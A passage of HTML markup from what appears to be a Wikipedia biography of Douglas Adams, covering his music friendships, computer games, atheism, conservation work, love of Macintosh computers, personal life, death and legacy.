Harum</span></h4>\n<p>Adams was a friend of <a href=\"/wiki/Gary_Brooker\" title=\"Gary Brooker\">Gary Brooker</a>, the lead singer, pianist and songwriter of <a href=\"/wiki/Procol_Harum\" title=\"Procol Harum\">Procol Harum</a>. Adams invited Brooker to one of the many parties that Adams held at his house. On one such occasion Gary Brooker performed the full (4 verse) version of \"<a href=\"/wiki/A_Whiter_Shade_of_Pale\" title=\"A Whiter Shade of Pale\">A Whiter Shade of Pale</a>\". Brooker also performed at Adams's memorial service.</p>\n<p>Adams appeared on stage with Brooker to perform \"In Held 'Twas in I\" at Redhill when the band's lyricist <a href=\"/wiki/Keith_Reid\" title=\"Keith Reid\">Keith Reid</a> was not available. On several other occasions he introduced Procol Harum at their gigs.</p>\n<p>Adams would listen to music while writing, and this would occasionally influence his work. On one occasion the title track from the Procol Harum album <i><a href=\"/wiki/Grand_Hotel_(album)\" title=\"Grand Hotel (album)\">Grand Hotel</a></i> was playing when</p>\n<blockquote class=\"templatequote\">\n<p>Suddenly in the middle of the song there was this huge orchestral climax that came out of nowhere and did not seem to be about anything. I kept wondering what was this huge thing happening in the background? And I eventually thought ... it sounds as if there ought to be some sort of floorshow going on. Something huge and extraordinary, like, well, like the end of the universe. And so that was where the idea for The Restaurant at the End of the Universe came from.</p>\n<div class=\"templatequotecite\"><cite>— Douglas Adams, Procol Harum at The Barbican<sup id=\"cite_ref-29\" class=\"reference\"><a href=\"#cite_note-29\">[29]</a></sup></cite></div>\n</blockquote>\n<h3><span class=\"mw-headline\" id=\"Computer_games_and_projects\">Computer games and projects</span></h3>\n<p>Douglas Adams created an <a href=\"/wiki/Interactive_fiction\" title=\"Interactive fiction\">interactive fiction</a> version of <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(computer_game)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (computer game)\">HHGG</a></i> with <a href=\"/wiki/Steve_Meretzky\" title=\"Steve Meretzky\">Steve Meretzky</a> from <a href=\"/wiki/Infocom\" title=\"Infocom\">Infocom</a> in 1984. In 1986 he participated in a week-long brainstorming session with the <a href=\"/wiki/Lucasfilm_Games\" class=\"mw-redirect\" title=\"Lucasfilm Games\">Lucasfilm Games</a> team for the game <i><a href=\"/wiki/Labyrinth:_The_Computer_Game\" title=\"Labyrinth: The Computer Game\">Labyrinth</a></i>. Later he was also involved in creating <i><a href=\"/wiki/Bureaucracy_(computer_game)\" class=\"mw-redirect\" title=\"Bureaucracy (computer game)\">Bureaucracy</a></i> (also by Infocom, but not based on any book; Adams wrote it as a parody of events in his own life).</p>\n<p>Adams was a founder-director and Chief Fantasist of <a href=\"/wiki/The_Digital_Village\" title=\"The Digital Village\">The Digital Village</a>, a digital media and Internet company with which he created <i><a href=\"/wiki/Starship_Titanic\" title=\"Starship Titanic\">Starship Titanic</a></i>, a <a href=\"/wiki/Codie\" class=\"mw-redirect\" title=\"Codie\">Codie</a> Award-winning and <a href=\"/wiki/BAFTA#Games_Awards\" class=\"mw-redirect\" title=\"BAFTA\">BAFTA-nominated adventure game</a>, which was published in 1998 by <a href=\"/wiki/Simon_%26_Schuster\" title=\"Simon & Schuster\">Simon & Schuster</a>.<sup id=\"cite_ref-bbc.co.uk_30-0\" class=\"reference\"><a href=\"#cite_note-bbc.co.uk-30\">[30]</a></sup><sup id=\"cite_ref-31\" class=\"reference\"><a href=\"#cite_note-31\">[31]</a></sup> <a href=\"/wiki/Terry_Jones\" title=\"Terry Jones\">Terry Jones</a> wrote the accompanying book, entitled <i>Douglas Adams Starship Titanic</i>, since Adams was too busy with the computer game to do both. In April 1999, Adams initiated the <a href=\"/wiki/H2g2\" title=\"H2g2\">h2g2</a> <a href=\"/wiki/Collaborative_writing\" title=\"Collaborative writing\">collaborative writing</a> project, an experimental attempt at making <i>The Hitchhiker's Guide to the Galaxy</i> a reality, and at harnessing the collective brainpower of the internet community. It found a new home at BBC Online in 2001.<sup id=\"cite_ref-bbc.co.uk_30-1\" class=\"reference\"><a href=\"#cite_note-bbc.co.uk-30\">[30]</a></sup></p>\n<p>In 1990 Adams wrote and presented a television documentary programme <i><a href=\"/wiki/Hyperland\" title=\"Hyperland\">Hyperland</a></i><sup id=\"cite_ref-32\" class=\"reference\"><a href=\"#cite_note-32\">[32]</a></sup> which featured <a href=\"/wiki/Tom_Baker\" title=\"Tom Baker\">Tom Baker</a> as a \"software agent\" (similar to the assistant pictured in Apple's <a href=\"/wiki/Knowledge_Navigator\" title=\"Knowledge Navigator\">Knowledge Navigator</a> video of future concepts from 1987), and interviews with <a href=\"/wiki/Ted_Nelson\" title=\"Ted Nelson\">Ted Nelson</a>, the co-inventor of <a href=\"/wiki/Hypertext\" title=\"Hypertext\">hypertext</a> and the person who coined the term. Although Adams did not invent hypertext, he was an <a href=\"/wiki/Early_adopter\" title=\"Early adopter\">early adopter</a> and advocate of it. This was the same year that <a href=\"/wiki/Tim_Berners-Lee\" title=\"Tim Berners-Lee\">Tim Berners-Lee</a> used the idea of hypertext in his <a href=\"/wiki/HTML\" title=\"HTML\">HTML</a>.</p>\n<h2><span class=\"mw-headline\" id=\"Personal_beliefs_and_activism\">Personal beliefs and activism</span></h2>\n<h3><span class=\"mw-headline\" id=\"Atheism_and_views_on_religion\">Atheism and views on religion</span></h3>\n<p>Adams described himself as a \"radical <a href=\"/wiki/Atheist\" class=\"mw-redirect\" title=\"Atheist\">atheist</a>\", adding <i>radical</i> for emphasis so he would not be asked if he meant agnostic. He told <a href=\"/wiki/American_Atheists\" title=\"American Atheists\">American Atheists</a> that this made things easier, but most importantly it conveyed the fact that he really meant it. \"I am convinced that there is not a god,\" he said. He imagined a <a href=\"/wiki/Fine-tuned_Universe#In_popular_culture\" title=\"Fine-tuned Universe\">sentient puddle</a> who wakes up one morning and thinks, \"This is an interesting world I find myself in – an interesting hole I find myself in – fits me rather neatly, doesn't it? In fact it fits me staggeringly well, must have been made to have me in it!\" to demonstrate his view that the <a href=\"/wiki/Fine-tuned_Universe\" title=\"Fine-tuned Universe\">fine-tuned Universe</a> argument for God was a fallacy.<sup id=\"cite_ref-33\" class=\"reference\"><a href=\"#cite_note-33\">[33]</a></sup></p>\n<p>Despite this, he remained fascinated by religion because of its effect on human affairs. \"I love to keep poking and prodding at it. I've thought about it so much over the years that that fascination is bound to spill over into my writing.\"<sup id=\"cite_ref-amath_34-0\" class=\"reference\"><a href=\"#cite_note-amath-34\">[34]</a></sup></p>\n<p>The evolutionary biologist and atheist <a href=\"/wiki/Richard_Dawkins\" title=\"Richard Dawkins\">Richard Dawkins</a> uses Adams's influence throughout to exemplify arguments for non-belief in his 2006 book <i><a href=\"/wiki/The_God_Delusion\" title=\"The God Delusion\">The God Delusion</a></i>. Dawkins dedicated the book to Adams, whom he jokingly called \"possibly [my] only convert\" to atheism<sup id=\"cite_ref-TheGuardian_35-0\" class=\"reference\"><a href=\"#cite_note-TheGuardian-35\">[35]</a></sup> and wrote on his death that \"Science has lost a friend, literature has lost a luminary, the <a href=\"/wiki/Mountain_gorilla\" title=\"Mountain gorilla\">mountain gorilla</a> and the <a href=\"/wiki/Black_rhino\" class=\"mw-redirect\" title=\"Black rhino\">black rhino</a> have lost a gallant defender.\"<sup id=\"cite_ref-Dawkins2001_36-0\" class=\"reference\"><a href=\"#cite_note-Dawkins2001-36\">[36]</a></sup></p>\n<h3><span class=\"mw-headline\" id=\"Environmental_activism\">Environmental activism</span></h3>\n<p>Adams was also an <a href=\"/wiki/Environmental_activist\" class=\"mw-redirect\" title=\"Environmental activist\">environmental activist</a> who campaigned on behalf of <a href=\"/wiki/Endangered_species\" title=\"Endangered species\">endangered species</a>. This activism included the production of the non-fiction radio series <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i>, in which he and <a href=\"/wiki/Natural_history\" title=\"Natural history\">naturalist</a> <a href=\"/wiki/Mark_Carwardine\" title=\"Mark Carwardine\">Mark Carwardine</a> visited rare species such as the <a href=\"/wiki/Kakapo\" title=\"Kakapo\">kakapo</a> and <a href=\"/wiki/Chinese_river_dolphin\" class=\"mw-redirect\" title=\"Chinese river dolphin\">baiji</a>, and the publication of a tie-in book of the same name. In 1992 this was made into a CD-ROM combination of <a href=\"/wiki/Audiobook\" title=\"Audiobook\">audiobook</a>, <a href=\"/wiki/E-book\" title=\"E-book\">e-book</a> and picture slide show.</p>\n<p>Adams and Mark Carwardine contributed the 'Meeting a Gorilla' passage from <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i> to the book <i><a href=\"/wiki/Great_Ape_Project\" title=\"Great Ape Project\">The Great Ape Project</a></i>.<sup id=\"cite_ref-37\" class=\"reference\"><a href=\"#cite_note-37\">[37]</a></sup> This book, edited by <a href=\"/wiki/Paola_Cavalieri\" title=\"Paola Cavalieri\">Paola Cavalieri</a> and <a href=\"/wiki/Peter_Singer\" title=\"Peter Singer\">Peter Singer</a>, launched a wider-scale project in 1993, which calls for the extension of moral equality to include all great apes, human and non-human.</p>\n<p>In 1994 he participated in a climb of <a href=\"/wiki/Mount_Kilimanjaro\" title=\"Mount Kilimanjaro\">Mount Kilimanjaro</a> while wearing a rhino suit for the British charity organisation <i><a href=\"/wiki/Save_the_Rhino\" title=\"Save the Rhino\">Save the Rhino International</a></i>. Puppeteer <a href=\"/wiki/William_Todd-Jones\" title=\"William Todd-Jones\">William Todd-Jones</a>, who had originally worn the suit in the London Marathon to raise money and bring awareness to the group, also participated in the climb wearing a rhino suit; Adams wore the suit while travelling to the mountain before the climb began. About £100,000 was raised through that event, benefiting schools in <a href=\"/wiki/Kenya\" title=\"Kenya\">Kenya</a> and a <a href=\"/wiki/Black_rhinoceros\" title=\"Black rhinoceros\">black rhinoceros</a> preservation programme in <a href=\"/wiki/Tanzania\" title=\"Tanzania\">Tanzania</a>. Adams was also an active supporter of the <i><a href=\"/wiki/Dian_Fossey\" title=\"Dian Fossey\">Dian Fossey</a> Gorilla Fund</i>.</p>\n<p>Since 2003, <i>Save the Rhino</i> has held an annual Douglas Adams Memorial Lecture around the time of his birthday to raise money for environmental campaigns.<sup id=\"cite_ref-38\" class=\"reference\"><a href=\"#cite_note-38\">[38]</a></sup> The lectures in the series are:</p>\n<ul>\n<li>2003 <a href=\"/wiki/Richard_Dawkins\" title=\"Richard Dawkins\">Richard Dawkins</a> – <i>Queerer than we can suppose: the strangeness of science</i></li>\n<li>2004 <a href=\"/wiki/Robert_Swan\" title=\"Robert Swan\">Robert Swan</a> – <i>Mission Antarctica</i></li>\n<li>2005 <a href=\"/wiki/Mark_Carwardine\" title=\"Mark Carwardine\">Mark Carwardine</a> – <i>Last Chance to See... Just a bit more</i></li>\n<li>2006 <a href=\"/wiki/Robert_Winston\" title=\"Robert Winston\">Robert Winston</a> – <i>Is the Human an Endangered Species?</i></li>\n<li>2007 <a href=\"/wiki/Richard_Leakey\" title=\"Richard Leakey\">Richard Leakey</a> – <i>Wildlife Management in East Africa – Is there a future?</i></li>\n<li>2008 <a href=\"/wiki/Steven_Pinker\" title=\"Steven Pinker\">Steven Pinker</a> – <i>The Stuff of Thought, Language as a Window into Human Nature</i></li>\n<li>2009 <a href=\"/wiki/Benedict_Allen\" title=\"Benedict Allen\">Benedict Allen</a> – <i>Unbreakable</i></li>\n<li>2010 <a href=\"/wiki/Marcus_du_Sautoy\" title=\"Marcus du Sautoy\">Marcus du Sautoy</a> – <i>42: the answer to life, the universe and prime numbers</i></li>\n<li>2011 <a href=\"/wiki/Brian_Cox_(physicist)\" title=\"Brian Cox (physicist)\">Brian Cox</a> – <i>The Universe and Why We Should Explore It</i></li>\n<li>2012 Lecture replaced by \"Douglas Adams The Party\"<sup id=\"cite_ref-39\" class=\"reference\"><a href=\"#cite_note-39\">[39]</a></sup></li>\n<li>2013 <a href=\"/wiki/Adam_Rutherford\" title=\"Adam Rutherford\">Adam Rutherford</a> – <i>Creation: the origin and the future of life</i><sup id=\"cite_ref-40\" class=\"reference\"><a href=\"#cite_note-40\">[40]</a></sup></li>\n<li>2014 <a href=\"/wiki/Roger_Highfield\" title=\"Roger Highfield\">Roger Highfield</a> and <a href=\"/wiki/Simon_Singh\" title=\"Simon Singh\">Simon Singh</a> – <i>The Science of Harry Potter and the Mathematics of The Simpsons</i><sup id=\"cite_ref-41\" class=\"reference\"><a href=\"#cite_note-41\">[41]</a></sup></li>\n<li>2015 <a href=\"/wiki/Neil_Gaiman\" title=\"Neil Gaiman\">Neil Gaiman</a> – <i>Immortality and Douglas Adams</i><sup id=\"cite_ref-42\" class=\"reference\"><a href=\"#cite_note-42\">[42]</a></sup></li>\n<li>2016 <a href=\"/wiki/Alice_Roberts\" title=\"Alice Roberts\">Alice Roberts</a> – <i>Survivors of the Ice Age</i><sup id=\"cite_ref-43\" class=\"reference\"><a href=\"#cite_note-43\">[43]</a></sup></li>\n</ul>\n<h3><span class=\"mw-headline\" id=\"Technology_and_innovation\">Technology and innovation</span></h3>\n<p>Adams bought his first <a href=\"/wiki/Word_processor\" title=\"Word processor\">word processor</a> in 1982, having considered one as early as 1979. His first purchase was a 'Nexus'. In 1983, when he and Jane Belson went out to Los Angeles, he bought a <a href=\"/wiki/Digital_Equipment_Corporation\" title=\"Digital Equipment Corporation\">DEC</a> <a href=\"/wiki/Rainbow_100\" title=\"Rainbow 100\">Rainbow</a>. Upon their return to England, Adams bought an <a href=\"/wiki/Apricot_Computers\" title=\"Apricot Computers\">Apricot</a>, then a <a href=\"/wiki/BBC_Micro\" title=\"BBC Micro\">BBC Micro</a> and a <a href=\"/wiki/Tandy_1000\" title=\"Tandy 1000\">Tandy 1000</a>.<sup id=\"cite_ref-Simpson_184-185_44-0\" class=\"reference\"><a href=\"#cite_note-Simpson_184-185-44\">[44]</a></sup> In <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i> Adams mentions his <a href=\"/wiki/Cambridge_Z88\" title=\"Cambridge Z88\">Cambridge Z88</a>, which he had taken to <a href=\"/wiki/Zaire\" title=\"Zaire\">Zaire</a> on a quest to find the <a href=\"/wiki/Northern_white_rhinoceros\" title=\"Northern white rhinoceros\">northern white rhinoceros</a>.<sup id=\"cite_ref-45\" class=\"reference\"><a href=\"#cite_note-45\">[45]</a></sup></p>\n<p>Adams's posthumously published work, <i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i>, features multiple articles by him on the subject of technology, including reprints of articles that originally ran in <i><a href=\"/wiki/MacUser\" title=\"MacUser\">MacUser</a></i> magazine, and in <i><a href=\"/wiki/The_Independent_on_Sunday\" class=\"mw-redirect\" title=\"The Independent on Sunday\">The Independent on Sunday</a></i> newspaper. In these Adams claims that one of the first computers he ever saw was a <a href=\"/wiki/Commodore_PET\" title=\"Commodore PET\">Commodore PET</a>, and that he has \"adored\" his Apple Macintosh (\"or rather my family of however many Macintoshes it is that I've recklessly accumulated over the years\") since he first saw one at Infocom's offices in Boston in 1984.<sup id=\"cite_ref-46\" class=\"reference\"><a href=\"#cite_note-46\">[46]</a></sup></p>\n<p>Adams was a Macintosh user from the time they first came out in 1984 until his death in 2001. He was the first person to buy a Mac in Europe (the second being <a href=\"/wiki/Stephen_Fry\" title=\"Stephen Fry\">Stephen Fry</a> – though some accounts differ on this, saying Fry bought his Mac first. Fry claims he was second to Adams<sup id=\"cite_ref-47\" class=\"reference\"><a href=\"#cite_note-47\">[47]</a></sup>). Adams was also an \"<a href=\"/wiki/AppleMasters\" title=\"AppleMasters\">Apple Master</a>\", one of several celebrities whom Apple made into spokespeople for its products (other Apple Masters included <a href=\"/wiki/John_Cleese\" title=\"John Cleese\">John Cleese</a> and <a href=\"/wiki/Gregory_Hines\" title=\"Gregory Hines\">Gregory Hines</a>). Adams's contributions included a rock video that he created using the first version of <a href=\"/wiki/IMovie\" title=\"IMovie\">iMovie</a> with footage featuring his daughter Polly. The video was available on Adams's <a href=\"/wiki/.Mac\" class=\"mw-redirect\" title=\".Mac\">.Mac</a> homepage. Adams installed and started using the first release of <a href=\"/wiki/Mac_OS_X\" class=\"mw-redirect\" title=\"Mac OS X\">Mac OS X</a> in the weeks leading up to his death. His very last post to his own forum was in praise of Mac OS X and the possibilities of its <a href=\"/wiki/Cocoa_(API)\" title=\"Cocoa (API)\">Cocoa</a> programming framework. He said it was \"awesome...\", which was also the last word he wrote on his site.<sup id=\"cite_ref-48\" class=\"reference\"><a href=\"#cite_note-48\">[48]</a></sup></p>\n<p>Adams used e-mail extensively long before it reached popular awareness, using it to correspond with <a href=\"/wiki/Steve_Meretzky\" title=\"Steve Meretzky\">Steve Meretzky</a> during the pair's collaboration on Infocom's version of <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(computer_game)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (computer game)\">The Hitchhiker's Guide to the Galaxy</a></i>.<sup id=\"cite_ref-Simpson_184-185_44-1\" class=\"reference\"><a href=\"#cite_note-Simpson_184-185-44\">[44]</a></sup> While living in New Mexico in 1993 he set up another e-mail address and began posting to his own <a href=\"/wiki/USENET\" class=\"mw-redirect\" title=\"USENET\">USENET</a> newsgroup, alt.fan.douglas-adams, and occasionally, when his computer was acting up, to the comp.sys.mac hierarchy.<sup id=\"cite_ref-49\" class=\"reference\"><a href=\"#cite_note-49\">[49]</a></sup> Many of his posts are now archived through Google. Challenges to the authenticity of his messages later led Adams to set up a message forum on his own website to avoid the issue. In 1996, Adams was a keynote speaker at The <a href=\"/wiki/Microsoft\" title=\"Microsoft\">Microsoft</a> <a href=\"/wiki/Professional_Developers_Conference\" title=\"Professional Developers Conference\">Professional Developers Conference</a> (PDC) where he described the personal computer as being a modelling device. The video of his keynote speech is archived on <a href=\"/wiki/Channel_9_(discussion_forum)\" class=\"mw-redirect\" title=\"Channel 9 (discussion forum)\">Channel 9</a>.<sup id=\"cite_ref-50\" class=\"reference\"><a href=\"#cite_note-50\">[50]</a></sup> Adams was also a keynote speaker for the April 2001 <a href=\"/w/index.php?title=Embedded_Systems_Conference&action=edit&redlink=1\" class=\"new\" title=\"Embedded Systems Conference (page does not exist)\">Embedded Systems Conference</a> in San Francisco, one of the major technical conferences on <a href=\"/wiki/Embedded_system\" title=\"Embedded system\">embedded system</a> engineering. In his keynote speech, he shared his vision of technology and how it should contribute in everyday – and every man's – life.<sup id=\"cite_ref-51\" class=\"reference\"><a href=\"#cite_note-51\">[51]</a></sup></p>\n<h2><span class=\"mw-headline\" id=\"Personal_life\">Personal life</span></h2>\n<p>Adams moved to <a href=\"/wiki/Upper_Street\" title=\"Upper Street\">Upper Street</a>, <a href=\"/wiki/Islington\" title=\"Islington\">Islington</a>, in 1981<sup id=\"cite_ref-IPP_52-0\" class=\"reference\"><a href=\"#cite_note-IPP-52\">[52]</a></sup> and to Duncan Terrace, a few minutes' walk away, in the late 1980s.<sup id=\"cite_ref-IPP_52-1\" class=\"reference\"><a href=\"#cite_note-IPP-52\">[52]</a></sup></p>\n<p>In the early 1980s Adams had an affair with novelist <a href=\"/wiki/Sally_Emerson\" title=\"Sally Emerson\">Sally Emerson</a>, who was separated from her husband at that time. Adams later dedicated his book <i><a href=\"/wiki/Life,_the_Universe_and_Everything\" title=\"Life, the Universe and Everything\">Life, the Universe and Everything</a></i> to Emerson. In 1981 Emerson returned to her husband, <a href=\"/wiki/Peter_Stothard\" title=\"Peter Stothard\">Peter Stothard</a>, a contemporary of Adams's at <a href=\"/wiki/Brentwood_School_(England)\" class=\"mw-redirect\" title=\"Brentwood School (England)\">Brentwood School</a>, and later editor of <i><a href=\"/wiki/The_Times\" title=\"The Times\">The Times</a></i>. Adams was soon introduced by friends to Jane Belson, with whom he later became romantically involved. Belson was the \"lady barrister\" mentioned in the jacket-flap biography printed in his books during the mid-1980s (\"He [Adams] lives in Islington with a lady barrister and an Apple Macintosh\"). The two lived in Los Angeles together during 1983 while Adams worked on an early screenplay adaptation of <i>Hitchhiker's</i>. When the deal fell through, they moved back to London, and after several separations (\"He is currently not certain where he lives, or with whom\")<sup id=\"cite_ref-sfweekly_53-0\" class=\"reference\"><a href=\"#cite_note-sfweekly-53\">[53]</a></sup> and an aborted engagement, they married on 25 November 1991. Adams and Belson had one daughter together, Polly Jane Rocket Adams, born on 22 June 1994, shortly after Adams turned 42. In 1999 the family moved from London to <a href=\"/wiki/Santa_Barbara,_California\" title=\"Santa Barbara, California\">Santa Barbara, California</a>, where they lived until his death. Following the funeral, Jane Belson and Polly Adams returned to London.<sup id=\"cite_ref-54\" class=\"reference\"><a href=\"#cite_note-54\">[54]</a></sup> Jane died on 7 September 2011 of cancer, aged 59.<sup id=\"cite_ref-timesobit_55-0\" class=\"reference\"><a href=\"#cite_note-timesobit-55\">[55]</a></sup><sup id=\"cite_ref-h2g2obit_56-0\" class=\"reference\"><a href=\"#cite_note-h2g2obit-56\">[56]</a></sup></p>\n<h2><span class=\"mw-headline\" id=\"Death_and_legacy\">Death and legacy</span></h2>\n<div class=\"thumb tright\">\n<div class=\"thumbinner\" style=\"width:222px;\"><a href=\"/wiki/File:Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/a/aa/Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg/220px-Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg\" width=\"220\" height=\"147\" class=\"thumbimage\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/a/aa/Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg/330px-Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/a/aa/Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg/440px-Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg 2x\" data-file-width=\"4189\" data-file-height=\"2793\" /></a>\n<div class=\"thumbcaption\">\n<div class=\"magnify\"><a href=\"/wiki/File:Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg\" class=\"internal\" title=\"Enlarge\"></a></div>\nAdams's gravestone, <a href=\"/wiki/Highgate_Cemetery\" title=\"Highgate Cemetery\">Highgate Cemetery</a>, North London</div>\n</div>\n</div>\n<p>Adams died of a <a href=\"/wiki/Heart_attack\" class=\"mw-redirect\" title=\"Heart attack\">heart attack</a> on 11 May 2001, aged 49, after resting from his regular workout at a private gym in <a href=\"/wiki/Montecito,_California\" title=\"Montecito, California\">Montecito, California</a>. He had unknowingly suffered a gradual narrowing of the <a href=\"/wiki/Coronary_arteries\" class=\"mw-redirect\" title=\"Coronary arteries\">coronary arteries</a>, which led at that moment to a <a href=\"/wiki/Myocardial_infarction\" title=\"Myocardial infarction\">myocardial infarction</a> and a fatal <a href=\"/wiki/Cardiac_arrhythmia\" title=\"Cardiac arrhythmia\">cardiac arrhythmia</a>.<sup class=\"noprint Inline-Template Template-Fact\" style=\"white-space:nowrap;\">[<i><a href=\"/wiki/Wikipedia:Citation_needed\" title=\"Wikipedia:Citation needed\"><span title=\"This claim needs references to reliable sources. (October 2016)\">citation needed</span></a></i>]</sup> Adams had been due to deliver the commencement address at <a href=\"/wiki/Harvey_Mudd_College\" title=\"Harvey Mudd College\">Harvey Mudd College</a> on 13 May.<sup id=\"cite_ref-57\" class=\"reference\"><a href=\"#cite_note-57\">[57]</a></sup> His funeral was held on 16 May in Santa Barbara, California. His remains were subsequently cremated and the ashes placed in <a href=\"/wiki/Highgate_Cemetery\" title=\"Highgate Cemetery\">Highgate Cemetery</a> in north London in June 2002.<sup id=\"cite_ref-Simpson_337-338_58-0\" class=\"reference\"><a href=\"#cite_note-Simpson_337-338-58\">[58]</a></sup></p>\n<p>A memorial service was held on 17 September 2001 at <a href=\"/wiki/St_Martin-in-the-Fields\" title=\"St Martin-in-the-Fields\">St Martin-in-the-Fields</a> church, <a href=\"/wiki/Trafalgar_Square\" title=\"Trafalgar Square\">Trafalgar Square</a>, London. This became the first church service broadcast live on the web by the BBC.<sup id=\"cite_ref-59\" class=\"reference\"><a href=\"#cite_note-59\">[59]</a></sup> Video clips of the service are still available on the BBC's website for download.<sup id=\"cite_ref-60\" class=\"reference\"><a href=\"#cite_note-60\">[60]</a></sup></p>\n<p>One of his last public appearances was a talk given at the University of California, Santa Barbara, <i>Parrots, the universe and everything</i>, recorded days before his death.<sup id=\"cite_ref-61\" class=\"reference\"><a href=\"#cite_note-61\">[61]</a></sup> A full transcript of the talk is available, and the university has made the full video available on <a rel=\"nofollow\" class=\"external text\" href=\"https://www.youtube.com/watch?v=_ZG8HBuDjgc\">YouTube</a>.<sup id=\"cite_ref-62\" class=\"reference\"><a href=\"#cite_note-62\">[62]</a></sup></p>\n<p>The <a href=\"/wiki/Minor_Planet_Centre\" class=\"mw-redirect\" title=\"Minor Planet Centre\">Minor Planet Centre</a> space agency named an asteroid <a href=\"/wiki/18610_Arthurdent\" title=\"18610 Arthurdent\">18610 Arthurdent</a>, coincidentally announcing its plan two days before Adams died.<sup id=\"cite_ref-MPC42677_63-0\" class=\"reference\"><a href=\"#cite_note-MPC42677-63\">[63]</a></sup> There is also an <a href=\"/wiki/25924_Douglasadams\" title=\"25924 Douglasadams\">asteroid named after Adams himself</a>.<sup id=\"cite_ref-64\" class=\"reference\"><a href=\"#cite_note-64\">[64]</a></sup></p>\n<p>In May 2002 <i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i> was published, containing many short stories, essays, and letters, as well as eulogies from <a href=\"/wiki/Richard_Dawkins\" title=\"Richard Dawkins\">Richard Dawkins</a>, <a href=\"/wiki/Stephen_Fry\" title=\"Stephen Fry\">Stephen Fry</a> (in the UK edition), <a href=\"/wiki/Christopher_Cerf\" title=\"Christopher Cerf\">Christopher Cerf</a> (in the US edition), and <a href=\"/wiki/Terry_Jones\" title=\"Terry Jones\">Terry Jones</a> (in the US paperback edition). It also includes eleven chapters of his long-awaited but unfinished novel, <i>The Salmon of Doubt</i>, which was originally intended to become a new <a href=\"/wiki/Dirk_Gently\" title=\"Dirk Gently\">Dirk Gently</a> novel, but might have later become the sixth <i>Hitchhiker</i> novel.<sup id=\"cite_ref-65\" class=\"reference\"><a href=\"#cite_note-65\">[65]</a></sup><sup id=\"cite_ref-66\" class=\"reference\"><a href=\"#cite_note-66\">[66]</a></sup></p>\n<p>Other events after Adams's death included a <a href=\"/wiki/Webcast\" title=\"Webcast\">webcast</a> production of <i><a href=\"/wiki/Shada\" class=\"mw-redirect\" title=\"Shada\">Shada</a></i>, allowing the complete story to be told, radio dramatisations of the final three books in the <i>Hitchhiker's</i> series, and the completion of <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">the film adaptation</a> of <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(book)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (book)\">The Hitchhiker's Guide to the Galaxy</a></i>. The film, released in 2005, posthumously credits Adams as a producer, and several art design elements – including a head-shaped planet seen near the end of the film – incorporated Adams's features.</p>\n<p>A 12-part radio series based on the <a href=\"/wiki/Dirk_Gently\" title=\"Dirk Gently\">Dirk Gently</a> novels was announced in 2007, with annual transmissions starting in October.<sup id=\"cite_ref-67\" class=\"reference\"><a href=\"#cite_note-67\">[67]</a></sup></p>\n<p>BBC Radio 4 also commissioned a third Dirk Gently radio series based on the incomplete chapters of <i>The Salmon of Doubt</i>, and written by <a href=\"/wiki/Kim_Fuller\" title=\"Kim Fuller\">Kim Fuller</a>;<sup id=\"cite_ref-68\" class=\"reference\"><a href=\"#cite_note-68\">[68]</a></sup> but this was dropped in favour of a BBC TV series based on the two completed novels.<sup id=\"cite_ref-69\" class=\"reference\"><a href=\"#cite_note-69\">[69]</a></sup> A sixth <i>Hitchhiker</i> novel, <i><a href=\"/wiki/And_Another_Thing..._(novel)\" title=\"And Another Thing... (novel)\">And Another Thing...</a></i>, by <i><a href=\"/wiki/Artemis_Fowl_(series)\" title=\"Artemis Fowl (series)\">Artemis Fowl</a></i> author <a href=\"/wiki/Eoin_Colfer\" title=\"Eoin Colfer\">Eoin Colfer</a>, was released on 12 October 2009 (the 30th anniversary of the first book), published with the full support of Adams's estate. A <a href=\"/wiki/BBC_Radio_4\" title=\"BBC Radio 4\">BBC Radio 4</a> <i><a href=\"/wiki/Book_at_Bedtime\" title=\"Book at Bedtime\">Book at Bedtime</a></i> adaptation and an audio book soon followed.</p>\n<p>On 25 May 2001, two weeks after Adams's death, his fans organised a tribute known as <a href=\"/wiki/Towel_Day\" title=\"Towel Day\">Towel Day</a>, which has been observed every year since then.</p>\n<p>In 2011, over 3,000 people took part in a public vote to choose the subjects of <a href=\"/wiki/Blue_plaque\" title=\"Blue plaque\">People's Plaques</a> in Islington;<sup id=\"cite_ref-IPP_52-2\" class=\"reference\"><a href=\"#cite_note-IPP-52\">[52]</a></sup> Adams received 489 votes.</p>\n<p>On 11 March 2013, Adams's 61st birthday was celebrated with an interactive <a href=\"/wiki/Google_Doodle\" title=\"Google Doodle\">Google Doodle</a>.<sup id=\"cite_ref-GoogleDoodle2013a_70-0\" class=\"reference\"><a href=\"#cite_note-GoogleDoodle2013a-70\">[70]</a></sup><sup id=\"cite_ref-71\" class=\"reference\"><a href=\"#cite_note-71\">[71]</a></sup></p>\n<h2><span class=\"mw-headline\" id=\"Awards_and_nominations\">Awards and nominations</span></h2>\n<table class=\"wikitable\" style=\"font-size:90%\">\n<tr style=\"text-align:center;\">\n<th 